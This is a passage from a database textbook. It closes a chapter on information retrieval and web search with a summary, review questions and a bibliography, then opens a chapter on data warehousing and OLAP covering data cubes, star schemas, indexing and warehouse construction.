This social search activity may be done synchronously, asynchronously, co- located or in remote shared workspaces. Social psychologists have experimentally val- idated that the act of social discussions has facilitated cognitive performance. People in social groups can provide solutions (answers to questions), pointers to databases or to other people (meta-knowledge), validation and legitimization of ideas, and can serve as memory aids and help with problem reformulation. Guided participation is a process in which people co-construct knowledge in concert with peers in their com- munity. Information seeking is mostly a solitary activity on the Web today. Some recent work on collaborative search reports several interesting findings and the potential of this technology for better information access. 8.3 Conversational Search Conversational Search (CS) is an interactive and collaborative information finding interaction. The participants engage in a conversation and perform a social search activity that is aided by intelligent agents. The collaborative search activity helps the 28Yee (2003) describes faceted metadata for image search. 1028 Introduction to Information Retrieval and Web Search agent learn about conversations with interactions and feedback from participants. It uses the semantic retrieval model with natural language understanding to provide the users with faster and relevant search results. It moves search from being a soli- tary activity to being a more participatory activity for the user. The search agent performs multiple tasks of finding relevant information and connecting the users together; participants provide feedback to the agent during the conversations that allows the agent to perform better. 9 Summary In this chapter we covered an important area called information retrieval (IR) that is closely related to databases. With the advent of the Web, unstructured data with text, images, audio, and video is proliferating at phenomenal rates. While database management systems have a very good handle on structured data, the unstructured data containing a variety of data types is being stored mainly on ad hoc information repositories on the Web that are available for consumption primarily via IR systems. Google, Yahoo, and similar search engines are IR systems that make the advances in this field readily available for the average end-user, giving them a richer search expe- rience with continuous improvement. We started by defining the basic terminology of IR, presented the query and brows- ing modes of interaction in IR systems, and provided a comparison of the IR and database technologies. We presented schematics of the IR process at a detailed and an overview level, and then discussed digital libraries, which are repositories of tar- geted content on the Web for academic institutions as well as professional commu- nities, and gave a brief history of IR. We presented the various retrieval models including Boolean, vector space, proba- bilistic, and semantic models. They allow for a measurement of whether a docu- ment is relevant to a user query and provide similarity measurement heuristics. We then discussed various evaluation metrics such as recall and precision and F-score to measure the goodness of the results of IR queries. Then we presented different types of queries—besides keyword-based queries, which dominate, there are other types including Boolean, phrase, proximity, natural language, and others for which explicit support needs to be provided by the retrieval model. 
Text preprocessing is important in IR systems, and various activities like stopword removal, stemming, and the use of thesauruses were discussed. We then discussed the construction and use of inverted indexes, which are at the core of IR systems and contribute to factors involving search efficiency. Relevance feedback was briefly addressed—it is impor- tant to modify and improve the retrieval of pertinent information for the user through his interaction and engagement in the search process. We did a somewhat detailed introduction to analysis of the Web as it relates to information retrieval. We divided this treatment into the analysis of content, struc- ture, and usage of the Web. Web search was discussed, including an analysis of the Web link structure, followed by an introduction to algorithms for ranking the results from a Web search such as PageRank and HITS. Finally, we briefly discussed 1029 Introduction to Information Retrieval and Web Search current trends, including faceted search, social search, and conversational search. This is an introductory treatment of a vast field and the reader is referred to special- ized textbooks on information retrieval and search engines. Review Questions 1. What is structured data and unstructured data? Give an example of each from your experience with data that you may have used. 2. Give a general definition of information retrieval (IR). What does informa- tion retrieval involve when we consider information on the Web? 3. Discuss the types of data and the types of users in today’s information retrieval systems. 4. What is meant by navigational, informational, and transformational search? 5. What are the two main modes of interaction with an IR system? Describe with examples. 6. Explain the main differences between database and IR systems mentioned in Table 1. 7. Describe the main components of the IR system as shown in Figure 1. 8. What are digital libraries? What types of data are typically found in them? 9. Name some digital libraries that you have accessed. What do they contain and how far back does the data go? 10. Give a brief history of IR and mention the landmark developments. 11. What is the Boolean model of IR? What are its limitations? 12. What is the vector space model of IR? How does a vector get constructed to represent a document? 13. Define the TF-IDF scheme of determining the weight of a keyword in a document. What is the necessity of including IDF in the weight of a term? 14. What are probabilistic and semantic models of IR? 15. Define recall and precision in IR systems. 16. Give the definition of precision and recall in a ranked list of results at position i. 17. How is F-score defined as a metric of information retrieval? In what way does it account for both precision and recall? 18. What are the different types of queries in an IR system? Describe each with an example. 19. What are the approaches to processing phrase and proximity queries? 1030 Introduction to Information Retrieval and Web Search 20. Describe the detailed IR process shown in Figure 2. 21. What is stopword removal and stemming? Why are these processes necessary for better information retrieval? 22. What is a thesaurus? How is it beneficial to IR? 23. What is information extraction? What are the different types of information extraction from structured text? 24. What are vocabularies in IR systems? What role do they play in the indexing of documents? 25. Take five documents with about three sentences each with some related con- tent. 
Construct an inverted index of all important stems (keywords) from these documents. 26. Describe the process of constructing the result of a search request using an inverted index. 27. Define relevance feedback. 28. Describe the three types of Web analyses discussed in this chapter. 29. List the important tasks mentioned that are involved in analyzing Web con- tent. Describe each in a couple of sentences. 30. What are the three categories of agent-based Web content analyses men- tioned in this chapter? 31. What is the database-based approach to analyzing Web content? What are Web query systems? 32. What algorithms are popular in ranking or determining the importance of Web pages? Which algorithm was proposed by the founders of Google? 33. What is the basic idea behind the PageRank algorithm? 34. What are hubs and authority pages? How does the HITS algorithm use these concepts? 35. What can you learn from Web usage analysis? What data does it generate? 36. What mining operations are commonly performed on Web usage data? Give an example of each. 37. What are the applications of Web usage mining? 38. What is search relevance? How is it determined? 39. Define faceted search. Make up a set of facets for a database containing all types of buildings. For example, two facets could be “building value or price” and “building type (residential, office, warehouse, factory, and so on)”. 40. What is social search? What does collaborative social search involve? 41. Define and explain conversational search. 1031 Introduction to Information Retrieval and Web Search Selected Bibliography Information retrieval and search technologies are active areas of research and devel- opment in industry and academia. There are many IR textbooks that provide detailed discussion on the materials that we have briefly introduced in this chapter. A recent book entitled Search Engines: Information Retrieval in Practice by Croft, Metzler, and Strohman (2009) gives a practical overview of search engine concepts and principles. Introduction to Information Retrieval by Manning, Raghavan, and Schutze (2008) is an authoritative book on information retrieval. Another introduc- tory textbook in IR is Modern Information Retrieval by Ricardo Baeza-Yates and Berthier Ribeiro-Neto (1999), which provides detailed coverage of various aspects of IR technology. Gerald Salton’s (1968) and van Rijsbergen’s (1979) classic books on information retrieval provide excellent descriptions of the foundational research done in the IR field until the late 1960s. Salton also introduced the vector space model as a model of IR. Manning and Schutze (1999) provide a good summary of natural language technologies and text preprocessing. “Interactive Information Retrieval in Digital Environments” by Xie (2008) provides a good human-centered approach to information retrieval. The book Managing Gigabytes by Witten, Moffat, and Bell (1999) provides detailed discussions for indexing techniques. The TREC book by Voorhees and Harman (2005) provides a description of test collection and evaluation procedures in the context of TREC competitions. Broder (2002) classifies Web queries into three distinct classes—navigational, infor- mational, and transactional—and presents a detailed taxonomy of Web search. Covi and Kling (1996) give a broad definition for digital libraries in their paper and dis- cuss organizational dimensions of effective digital library use. 
Luhn (1957) did some seminal work in IR at IBM in the 1950s on autoindexing and business intelligence that received a lot of attention at that time. The SMART system (Salton et al. (1993)), developed at Cornell, was one of the earliest advanced IR systems that used fully automatic term indexing, hierarchical clustering, and document ranking by degree of similarity to the query. The SMART system represented documents and queries as weighted term vectors according to the vector space model. Porter (1980) is credited with the weak and strong stemming algorithms that have become standards. Robertson (1997) developed a sophisticated weighting scheme in the City University of London Okapi system that became very popular in TREC competitions. Lenat (1995) started the Cyc project in the 1980s for incorporating formal logic and knowl- edge bases in information processing systems. Efforts toward creating the WordNet thesaurus continued in the 1990s, and are still ongoing. WordNet concepts and prin- ciples are described in the book by Fellbaum (1998). Rocchio (1971) describes the relevance feedback algorithm, which is described in Salton’s (1971) book on The SMART Retrieval System–Experiments in Automatic Document Processing. Abiteboul, Buneman, and Suciu (1999) provide an extensive discussion of data on the Web in their book that emphasizes semistructured data. Atzeni and Mendelzon (2000) wrote an editorial in the VLDB journal on databases and the Web. Atzeni et al. (2002) propose models and transformations for Web-based data. Abiteboul et al. (1997) propose the Lord query language for managing semistructured data. 1032 Introduction to Information Retrieval and Web Search Chakrabarti (2002) is an excellent book on knowledge discovery from the Web. The book by Liu (2006) consists of several parts, each providing a comprehensive overview of the concepts involved with Web data analysis and its applications. Excellent survey articles on Web analysis include Kosala and Blockeel (2000) and Liu et al. (2004). Etzioni (1996) provides a good starting point for understanding Web mining and describes the tasks and issues related with the World Wide Web. An excellent overview of the research issues, techniques, and development efforts asso- ciated with Web content and usage analysis is presented by Cooley et al. (1997). Cooley (2003) focuses on mining Web usage patterns through the use of Web struc- ture. Spiliopoulou (2000) describes Web usage analysis in detail. Web mining based on page structure is described in Madria et al. (1999) and Chakraborti et al. (1999). Algorithms to compute the rank of a Web page are given by Page et al. (1999), who describe the famous PageRank algorithm, and Kleinberg (1998), who presents the HITS algorithm. 1033 Overview of Data Warehousing and OLAP The increasing processing power and sophisticationof analytical tools and techniques have resulted in the development of what are known as data warehouses. These data warehouses provide storage, functionality, and responsiveness to queries beyond the capabilities of transaction-oriented databases. Accompanying this ever-increasing power is a great demand to improve the data access performance of databases. Traditional databases balance the requirement of data access with the need to ensure data integrity. In modern organizations, users of data are often completely removed from the data sources. 
Many people only need read-access to data, but still need fast access to a larger volume of data than can conveniently be downloaded to the desk- top. Often such data comes from multiple databases. Because many of the analyses performed are recurrent and predictable, software vendors and systems support staff are designing systems to support these functions. Presently there is a great need to provide decision makers from middle management upward with information at the correct level of detail to support decision making. Data warehousing, online ana- lytical processing (OLAP), and data mining provide this functionality. In this chapter we give a broad overview of data warehousing and OLAP technologies. 1 Introduction, Definitions, and Terminology A database is a collection of related data and a database system is a database and database software together. A data warehouse is also a collection of information as well as a supporting system. However, a clear distinction exists. Traditional From Chapter 29 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison- Wesley. All rights reserved. 1034 Overview of Data Warehousing and OLAP databases are transactional (relational, object-oriented, network, or hierarchical). Data warehouses have the distinguishing characteristic that they are mainly intended for decision-support applications. They are optimized for data retrieval, not routine transaction processing. Because data warehouses have been developed in numerous organizations to meet particular needs, there is no single, canonical definition of the term data warehouse. Professional magazine articles and books in the popular press have elaborated on the meaning in a variety of ways. Vendors have capitalized on the popularity of the term to help market a variety of related products, and consultants have provided a large variety of services, all under the data warehousing banner. However, data warehouses are quite distinct from traditional databases in their structure, func- tioning, performance, and purpose. W. H. Inmon1 characterized a data warehouse as a subject-oriented, integrated, non- volatile, time-variant collection of data in support of management’s decisions. Data warehouses provide access to data for complex analysis, knowledge discovery, and decision making. They support high-performance demands on an organization’s data and information. Several types of applications—OLAP, DSS, and data mining applications—are supported. We define each of these next. OLAP (online analytical processing) is a term used to describe the analysis of com- plex data from the data warehouse. In the hands of skilled knowledge workers, OLAP tools use distributed computing capabilities for analyses that require more storage and processing power than can be economically and efficiently located on an individual desktop. DSS (decision-support systems), also known as EIS—executive information sys- tems; not to be confused with enterprise integration systems—support an organiza- tion’s leading decision makers with higher-level data for complex and important decisions. Data mining is used for knowledge discovery, the process of searching data for unanticipated new knowledge. Traditional databases support online transaction processing (OLTP), which includes insertions, updates, and deletions, while also supporting information query requirements. 
Traditional relational databases are optimized to process queries that may touch a small part of the database and transactions that deal with insertions or updates of a few tuples per relation to process. Thus, they cannot be optimized for OLAP, DSS, or data mining. By contrast, data warehouses are designed precisely to support efficient extraction, processing, and presentation for analytic and decision-making purposes. In comparison to traditional databases, data warehouses generally contain very large amounts of data from multiple sources that may include databases from different data models and sometimes files acquired from independent systems and platforms. 1Inmon (1992) is credited with initially using the term warehouse. The latest edition of his work is Inmon (2005). 1035 Overview of Data Warehousing and OLAP Databases Cleaning Backflushing Reformatting Data mining DSS EIS OLAP Other data inputs Updates/new data Metadata Data Data warehouse Figure 1 Sample transactions in market-basket model. 2 Characteristics of Data Warehouses To discuss data warehouses and distinguish them from transactional databases calls for an appropriate data model. The multidimensional data model (explained in more detail in Section 3) is a good fit for OLAP and decision-support technologies. In contrast to multidatabases, which provide access to disjoint and usually heteroge- neous databases, a data warehouse is frequently a store of integrated data from mul- tiple sources, processed for storage in a multidimensional model. Unlike most transactional databases, data warehouses typically support time-series and trend analysis, both of which require more historical data than is generally maintained in transactional databases. Compared with transactional databases, data warehouses are nonvolatile. This means that information in the data warehouse changes far less often and may be regarded as non–real-time with periodic updating. In transactional systems, transac- tions are the unit and are the agent of change to the database; by contrast, data ware- house information is much more coarse-grained and is refreshed according to a careful choice of refresh policy, usually incremental. Warehouse updates are handled by the warehouse’s acquisition component that provides all required preprocessing. We can also describe data warehousing more generally as a collection of decision sup- port technologies, aimed at enabling the knowledge worker (executive, manager, ana- lyst) to make better and faster decisions.2 Figure 1 gives an overview of the conceptual structure of a data warehouse. It shows the entire data warehousing process, which includes possible cleaning and reformatting of data before loading it into the ware- house. This process is handled by tools known as ETL (extraction, transformation, and loading) tools. At the back end of the process, OLAP, data mining, and DSS may generate new relevant information such as rules; this information is shown in the figure going back into the warehouse. The figure also shows that data sources may include files. 2Chaudhuri and Dayal (1997) provide an excellent tutorial on the topic, with this as a starting definition. 
Data warehouses have the following distinctive characteristics:3

■ Multidimensional conceptual view
■ Generic dimensionality
■ Unlimited dimensions and aggregation levels
■ Unrestricted cross-dimensional operations
■ Dynamic sparse matrix handling
■ Client-server architecture
■ Multiuser support
■ Accessibility
■ Transparency
■ Intuitive data manipulation
■ Consistent reporting performance
■ Flexible reporting

3Codd and Salley (1993) coined the term OLAP and mentioned these characteristics. We have reordered their original list.

Because they encompass large volumes of data, data warehouses are generally an order of magnitude (sometimes two orders of magnitude) larger than the source databases. The sheer volume of data (likely to be in terabytes or even petabytes) is an issue that has been dealt with through enterprise-wide data warehouses, virtual data warehouses, and data marts:

■ Enterprise-wide data warehouses are huge projects requiring massive investment of time and resources.
■ Virtual data warehouses provide views of operational databases that are materialized for efficient access.
■ Data marts generally are targeted to a subset of the organization, such as a department, and are more tightly focused.

3 Data Modeling for Data Warehouses

Multidimensional models take advantage of inherent relationships in data to populate data in multidimensional matrices called data cubes. (These may be called hypercubes if they have more than three dimensions.) For data that lends itself to dimensional formatting, query performance in multidimensional matrices can be much better than in the relational data model. Three examples of dimensions in a corporate data warehouse are the corporation’s fiscal periods, products, and regions.

A standard spreadsheet is a two-dimensional matrix. One example would be a spreadsheet of regional sales by product for a particular time period. Products could be shown as rows, with sales revenues for each region comprising the columns. (Figure 2 shows this two-dimensional organization.) Adding a time dimension, such as an organization’s fiscal quarters, would produce a three-dimensional matrix, which could be represented using a data cube.

[Figure 2 A two-dimensional matrix model: products (P123–P126) as rows and regions (Reg 1–Reg 3) as columns.]

Figure 3 shows a three-dimensional data cube that organizes product sales data by fiscal quarters and sales regions. Each cell could contain data for a specific product, specific fiscal quarter, and specific region. By including additional dimensions, a data hypercube could be produced, although more than three dimensions cannot be easily visualized or graphically presented. The data can be queried directly in any combination of dimensions, bypassing complex database queries. Tools exist for viewing data according to the user’s choice of dimensions.

[Figure 3 A three-dimensional data cube model: products (P123–P127) by regions (Reg 1–Reg 3) by fiscal quarters (Qtr 1–Qtr 4).]
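As an illustration of how the cells of such a cube can be derived from relational data, the following is a hedged SQL sketch; the SALES table and its column names are assumptions for this example only (the text does not define such a table). Each (product, region, fiscal quarter) group corresponds to one cell of the cube in Figure 3.

    -- One result row per cube cell: product x region x fiscal quarter.
    SELECT   Product, Region, Fiscal_quarter, SUM(Sales_revenue) AS Cell_total
    FROM     SALES
    GROUP BY Product, Region, Fiscal_quarter;

Dropping Fiscal_quarter from the SELECT and GROUP BY clauses yields the two-dimensional matrix of Figure 2; adding further grouping columns corresponds to adding dimensions to the cube.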
Changing from one dimensional hierarchy (orientation) to another is easily accomplished in a data cube with a technique called pivoting (also called rotation). In this technique the data cube can be thought of as rotating to show a different orientation of the axes. For example, you might pivot the data cube to show regional sales revenues as rows, the fiscal quarter revenue totals as columns, and the company’s products in the third dimension (Figure 4). Hence, this technique is equivalent to having a regional sales table for each product separately, where each table shows quarterly sales for that product region by region.

[Figure 4 Pivoted version of the data cube from Figure 3: regions (Reg 1–Reg 4) as rows, fiscal quarters (Qtr 1–Qtr 4) as columns, and products (P123–P127) as the third dimension.]

Multidimensional models lend themselves readily to hierarchical views in what is known as roll-up display and drill-down display. A roll-up display moves up the hierarchy, grouping into larger units along a dimension (for example, summing weekly data by quarter or by year). Figure 5 shows a roll-up display that moves from individual products to a coarser grain of product categories. Shown in Figure 6, a drill-down display provides the opposite capability, furnishing a finer-grained view, perhaps disaggregating country sales by region and then regional sales by subregion and also breaking up products by styles.

[Figure 5 The roll-up operation: product categories (Products 1XX–4XX) by region (Region 1–Region 3).]

[Figure 6 The drill-down operation: regions broken into subregions, and products (P123–P125) broken into styles A–D.]

The multidimensional storage model involves two types of tables: dimension tables and fact tables. A dimension table consists of tuples of attributes of the dimension. A fact table can be thought of as having tuples, one per recorded fact. This fact contains some measured or observed variable(s) and identifies it (them) with pointers to dimension tables. The fact table contains the data, and the dimensions identify each tuple in that data. Figure 7 contains an example of a fact table that can be viewed from the perspective of multiple dimension tables.

Two common multidimensional schemas are the star schema and the snowflake schema. The star schema consists of a fact table with a single table for each dimension (Figure 7). The snowflake schema is a variation on the star schema in which the dimensional tables from a star schema are organized into a hierarchy by normalizing them (Figure 8). Some installations are normalizing data warehouses up to the third normal form so that they can access the data warehouse to the finest level of detail.

[Figure 7 A star schema with fact and dimensional tables: a Business results fact table (Product, Quarter, Region, Sales_revenue) with a Product dimension table (Prod_no, Prod_name, Prod_descr, Prod_style, Prod_line), a Fiscal quarter dimension table (Qtr, Year, Beg_date, End_date), and a Region dimension table (Region, Subregion).]

[Figure 8 A snowflake schema: the Business results fact table (Product, Quarter, Region, Revenue) with normalized dimension tables Product (Prod_no, Prod_name, Style, Prod_line_no), Pname (Prod_name, Prod_descr), Pline (Prod_line_no, Prod_line_name), Fiscal quarter (Qtr, Year, Beg_date), FQ dates (Beg_date, End_date), and Sales revenue (Region, Subregion).]

A fact constellation is a set of fact tables that share some dimension tables. Figure 9 shows a fact constellation with two fact tables, business results and business forecast. These share the dimension table called product. Fact constellations limit the possible queries for the warehouse.

[Figure 9 A fact constellation: fact table I Business results (Product, Quarter, Region, Revenue) and fact table II Business forecast (Product, Future_qtr, Region, Projected_revenue), sharing the Product dimension table (Prod_no, Prod_name, Prod_descr, Prod_style, Prod_line).]

A sketch of how the fact and dimension tables of Figure 7 might be declared in SQL follows.
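The sketch below is one possible SQL declaration of the star schema of Figure 7. The figure specifies only the table and attribute names; the data types and the key and foreign-key constraints are assumptions added for illustration.

    -- Dimension tables of the star schema in Figure 7.
    CREATE TABLE PRODUCT (
      Prod_no     INT PRIMARY KEY,
      Prod_name   VARCHAR(30),
      Prod_descr  VARCHAR(100),
      Prod_style  VARCHAR(10),
      Prod_line   VARCHAR(10) );

    CREATE TABLE FISCAL_QUARTER (
      Qtr         CHAR(4),
      Year        INT,
      Beg_date    DATE,
      End_date    DATE,
      PRIMARY KEY (Qtr, Year) );

    CREATE TABLE REGION (
      Region      VARCHAR(20) PRIMARY KEY,
      Subregion   VARCHAR(20) );

    -- Fact table: one row per recorded (product, quarter, region) result,
    -- identified by pointers (foreign keys) into the dimension tables.
    CREATE TABLE BUSINESS_RESULTS (
      Product        INT REFERENCES PRODUCT (Prod_no),
      Quarter        CHAR(4),
      Region         VARCHAR(20) REFERENCES REGION (Region),
      Sales_revenue  DECIMAL(12,2),
      PRIMARY KEY (Product, Quarter, Region) );

A snowflake schema would differ only in that the Product dimension, for example, would be split into further normalized tables (Pname, Pline) as in Figure 8.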
Data warehouse storage also utilizes indexing techniques to support high-performance access. A technique called bitmap indexing constructs a bit vector for each value in a domain (column) being indexed. It works very well for domains of low cardinality. There is a 1 bit placed in the jth position in the vector if the jth row contains the value being indexed. For example, imagine an inventory of 100,000 cars with a bitmap index on car size. If there are four car sizes—economy, compact, mid-size, and full-size—there will be four bit vectors, each containing 100,000 bits (12.5K) for a total index size of 50K. Bitmap indexing can provide considerable input/output and storage space advantages in low-cardinality domains. With bit vectors a bitmap index can provide dramatic improvements in comparison, aggregation, and join performance. (A sketch of creating such an index appears at the end of this section.)

In a star schema, dimensional data can be indexed to tuples in the fact table by join indexing. Join indexes are traditional indexes to maintain relationships between primary key and foreign key values. They relate the values of a dimension of a star schema to rows in the fact table. For example, consider a sales fact table that has city and fiscal quarter as dimensions. If there is a join index on city, for each city the join index maintains the tuple IDs of tuples containing that city. Join indexes may involve multiple dimensions.

Data warehouse storage can facilitate access to summary data by taking further advantage of the nonvolatility of data warehouses and a degree of predictability of the analyses that will be performed using them. Two approaches have been used: (1) smaller tables including summary data such as quarterly sales or revenue by product line, and (2) encoding of level (for example, weekly, quarterly, annual) into existing tables. By comparison, the overhead of creating and maintaining such aggregations would likely be excessive in a volatile, transaction-oriented database.
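As a concrete illustration of the bitmap indexing technique described above, the statement below uses Oracle-style syntax (bitmap indexes are a vendor extension, not part of standard SQL), and the CAR table and Car_size column are hypothetical names for the car inventory example in the text. The resulting index holds one bit vector per distinct Car_size value.

    -- One bit vector per car size (economy, compact, mid-size, full-size);
    -- bit j of a vector is 1 if row j of CAR has that size.
    CREATE BITMAP INDEX car_size_bix ON CAR (Car_size);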
4 Building a Data Warehouse

In constructing a data warehouse, builders should take a broad view of the anticipated use of the warehouse. There is no way to anticipate all possible queries or analyses during the design phase. However, the design should specifically support ad-hoc querying, that is, accessing data with any meaningful combination of values for the attributes in the dimension or fact tables. For example, a marketing-intensive consumer-products company would require different ways of organizing the data warehouse than would a nonprofit charity focused on fund raising. An appropriate schema should be chosen that reflects anticipated usage.

Acquisition of data for the warehouse involves the following steps:

1. The data must be extracted from multiple, heterogeneous sources, for example, databases or other data feeds such as those containing financial market data or environmental data.

2. Data must be formatted for consistency within the warehouse. Names, meanings, and domains of data from unrelated sources must be reconciled. For instance, subsidiary companies of a large corporation may have different fiscal calendars with quarters ending on different dates, making it difficult to aggregate financial data by quarter. Various credit cards may report their transactions differently, making it difficult to compute all credit sales. These format inconsistencies must be resolved.

3. The data must be cleaned to ensure validity. Data cleaning is an involved and complex process that has been identified as the largest labor-demanding component of data warehouse construction. For input data, cleaning must occur before the data is loaded into the warehouse. There is nothing about cleaning data that is specific to data warehousing and that could not be applied to a host database. However, since input data must be examined and formatted consistently, data warehouse builders should take this opportunity to check for validity and quality. Recognizing erroneous and incomplete data is difficult to automate, and cleaning that requires automatic error correction can be even tougher. Some aspects, such as domain checking, are easily coded into data cleaning routines, but automatic recognition of other data problems can be more challenging. (For example, one might require that City = ‘San Francisco’ together with State = ‘CT’ be recognized as an incorrect combination.) After such problems have been taken care of, similar data from different sources must be coordinated for loading into the warehouse. As data managers in the organization discover that their data is being cleaned for input into the warehouse, they will likely want to upgrade their data with the cleaned data. The process of returning cleaned data to the source is called backflushing (see Figure 1).

4. The data must be fitted into the data model of the warehouse. Data from the various sources must be installed in the data model of the warehouse. Data may have to be converted from relational, object-oriented, or legacy databases (network and/or hierarchical) to a multidimensional model.

5. The data must be loaded into the warehouse. The sheer volume of data in the warehouse makes loading the data a significant task. Monitoring tools for loads as well as methods to recover from incomplete or incorrect loads are required. With the huge volume of data in the warehouse, incremental updating is usually the only feasible approach. The refresh policy will probably emerge as a compromise that takes into account the answers to the following questions:

■ How up-to-date must the data be?
■ Can the warehouse go offline, and for how long?
■ What are the data interdependencies?
■ What is the storage availability?
■ What are the distribution requirements (such as for replication and partitioning)?
■ What is the loading time (including cleaning, formatting, copying, transmitting, and overhead such as index rebuilding)?

As we have said, databases must strike a balance between efficiency in transaction processing and supporting query requirements (ad hoc user requests), but a data warehouse is typically optimized for access from a decision maker’s needs. Data storage in a data warehouse reflects this specialization and involves the following processes:

■ Storing the data according to the data model of the warehouse
■ Creating and maintaining required data structures
■ Creating and maintaining appropriate access paths
■ Providing for time-variant data as new data are added
■ Supporting the updating of warehouse data
■ Refreshing the data
■ Purging data

Although adequate time can be devoted initially to constructing the warehouse, the sheer volume of data in the warehouse generally makes it impossible to simply reload the warehouse in its entirety later on.
Alternatives include selective (partial) refreshing of data and separate warehouse versions (requiring double storage capacity for the warehouse!). When the warehouse uses an incremental data refreshing mechanism, data may need to be periodically purged; for example, a warehouse that maintains data on the previous twelve business quarters may periodically purge its data each year.

Data warehouses must also be designed with full consideration of the environment in which they will reside. Important design considerations include the following:

■ Usage projections
■ The fit of the data model
■ Characteristics of available sources
■ Design of the metadata component
■ Modular component design
■ Design for manageability and change
■ Considerations of distributed and parallel architecture

We discuss each of these in turn. Warehouse design is initially driven by usage projections; that is, by expectations about who will use the warehouse and how they will use it. Choice of a data model to support this usage is a key initial decision. Usage projections and the characteristics of the warehouse’s data sources are both taken into account. Modular design is a practical necessity to allow the warehouse to evolve with the organization and its information environment. Additionally, a well-built data warehouse must be designed for maintainability, enabling the warehouse managers to plan for and manage change effectively while providing optimal support to users.

Recall that metadata is the description of a database, including its schema definition. The metadata repository is a key data warehouse component; it includes both technical and business metadata. The first, technical metadata, covers details of acquisition processing, storage structures, data descriptions, warehouse operations and maintenance, and access support functionality. The second, business metadata, includes the relevant business rules and organizational details supporting the warehouse.

The architecture of the organization’s distributed computing environment is a major determining characteristic for the design of the warehouse. There are two basic distributed architectures: the distributed warehouse and the federated warehouse. For a distributed warehouse, all the issues of distributed databases are relevant, for example, replication, partitioning, communications, and consistency concerns. A distributed architecture can provide benefits particularly important to warehouse performance, such as improved load balancing, scalability of performance, and higher availability. A single replicated metadata repository would reside at each distribution site. The idea of the federated warehouse is like that of the federated database: a decentralized confederation of autonomous data warehouses, each with its own metadata repository. Given the magnitude of the challenge inherent to data warehouses, it is likely that such federations will consist of smaller scale components, such as data marts. Large organizations may choose to federate data marts rather than build huge data warehouses.

5 Typical Functionality of a Data Warehouse

Data warehouses exist to facilitate complex, data-intensive, and frequent ad hoc queries. Accordingly, data warehouses must provide far greater and more efficient query support than is demanded of transactional databases.
The data warehouse access component supports enhanced spreadsheet functionality, efficient query processing, structured queries, ad hoc queries, data mining, and materialized views. In particular, enhanced spreadsheet functionality includes support for state-of-the-art spreadsheet applications (for example, MS Excel) as well as for OLAP applications programs. These offer preprogrammed functionalities such as the following (a small SQL sketch of the first two operations is given after this list):

■ Roll-up. Data is summarized with increasing generalization (for example, weekly to quarterly to annually).
■ Drill-down. Increasing levels of detail are revealed (the complement of roll-up).
■ Pivot. Cross tabulation (also referred to as rotation) is performed.
■ Slice and dice. Projection operations are performed on the dimensions.
■ Sorting. Data is sorted by ordinal value.
■ Selection. Data is available by value or range.
■ Derived (computed) attributes. Attributes are computed by operations on stored and derived values.
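The sketch below illustrates roll-up and drill-down in SQL terms, using the GROUP BY ROLLUP extension that many SQL products provide; the text describes these as OLAP tool operations, not SQL statements, and the SALES table and its columns are hypothetical names used only for this example.

    -- Roll-up along the time hierarchy: ROLLUP produces totals per
    -- (year, quarter, week), then per (year, quarter), then per year,
    -- plus a grand total.
    SELECT   Year, Quarter, Week, SUM(Sales_revenue) AS Total
    FROM     SALES
    GROUP BY ROLLUP (Year, Quarter, Week);

    -- Drill-down is the reverse: grouping again by a finer column,
    -- here by week within a single quarter.
    SELECT   Week, SUM(Sales_revenue) AS Total
    FROM     SALES
    WHERE    Year = 2010 AND Quarter = 'Q1'
    GROUP BY Week;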
Because data warehouses are free from the restrictions of the transactional environment, there is an increased efficiency in query processing. Among the tools and techniques used are query transformation; index intersection and union; special ROLAP (relational OLAP) and MOLAP (multidimensional OLAP) functions; SQL extensions; advanced join methods; and intelligent scanning (as in piggy-backing multiple queries).

Improved performance has also been attained with parallel processing. Parallel server architectures include symmetric multiprocessor (SMP), cluster, and massively parallel processing (MPP), and combinations of these.

Knowledge workers and decision makers use tools ranging from parametric queries to ad hoc queries to data mining. Thus, the access component of the data warehouse must provide support for structured queries (both parametric and ad hoc). Together, these make up a managed query environment. Data mining itself uses techniques from statistical analysis and artificial intelligence. Statistical analysis can be performed by advanced spreadsheets, by sophisticated statistical analysis software, or by custom-written programs. Techniques such as lagging, moving averages, and regression analysis are also commonly employed. Artificial intelligence techniques, which may include genetic algorithms and neural networks, are used for classification and are employed to discover knowledge from the data warehouse that may be unexpected or difficult to specify in queries.

6 Data Warehouse versus Views

Some people have considered data warehouses to be an extension of database views. Materialized views are one way of meeting requirements for improved access to data. Materialized views have been explored for their performance enhancement. Views, however, provide only a subset of the functions and capabilities of data warehouses. Views and data warehouses are alike in that they both have read-only extracts from databases and subject orientation. However, data warehouses are different from views in the following ways:

■ Data warehouses exist as persistent storage instead of being materialized on demand.
■ Data warehouses are not usually relational, but rather multidimensional. Views of a relational database are relational.
■ Data warehouses can be indexed to optimize performance. Views cannot be indexed independent of the underlying databases.
■ Data warehouses characteristically provide specific support of functionality; views cannot.
■ Data warehouses provide large amounts of integrated and often temporal data, generally more than is contained in one database, whereas views are an extract of a database.

7 Difficulties of Implementing Data Warehouses

Some significant operational issues arise with data warehousing: construction, administration, and quality control. Project management—the design, construction, and implementation of the warehouse—is an important and challenging consideration that should not be underestimated. The building of an enterprise-wide warehouse in a large organization is a major undertaking, potentially taking years from conceptualization to implementation. Because of the difficulty and amount of lead time required for such an undertaking, the widespread development and deployment of data marts may provide an attractive alternative, especially to those organizations with urgent needs for OLAP, DSS, and/or data mining support.

The administration of a data warehouse is an intensive enterprise, proportional to the size and complexity of the warehouse. An organization that attempts to administer a data warehouse must realistically understand the complex nature of its administration. Although designed for read access, a data warehouse is no more a static structure than any of its information sources. Source databases can be expected to evolve. The warehouse’s schema and acquisition component must be expected to be updated to handle these evolutions.

A significant issue in data warehousing is the quality control of data. Both quality and consistency of data are major concerns. Although the data passes through a cleaning function during acquisition, quality and consistency remain significant issues for the database administrator. Melding data from heterogeneous and disparate sources is a major challenge given differences in naming, domain definitions, identification numbers, and the like. Every time a source database changes, the data warehouse administrator must consider the possible interactions with other elements of the warehouse.

